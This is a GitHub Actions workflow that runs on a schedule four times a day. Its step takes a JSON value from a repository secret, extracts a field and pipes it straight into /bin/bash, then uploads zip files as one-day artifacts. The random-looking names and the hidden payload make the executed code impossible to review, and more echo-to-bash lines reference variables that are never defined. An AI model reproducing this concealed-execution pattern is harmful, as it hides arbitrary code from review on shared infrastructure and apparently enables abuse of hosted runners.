name: gongaijingming
on:
  workflow_dispatch:

  schedule:
    - cron: '48 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gongaijingming
        env:
          r10824: ${{ secrets.r10824 }}
        run: |
          printf '%s' "$r10824" | jq -r .rwnc22544 | /bin/bash
          echo $scoa5 | jq -r .mvd84 | /bin/bash
          echo $yke63 | jq -r .feoq01 | /bin/bash
          echo $cfakc663 | jq -r .jetgp7075 | /bin/bash
          echo $exgmx428 | jq -r .obz9 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: FZANT3v8
          path: "*.zip"
          retention-days: 1
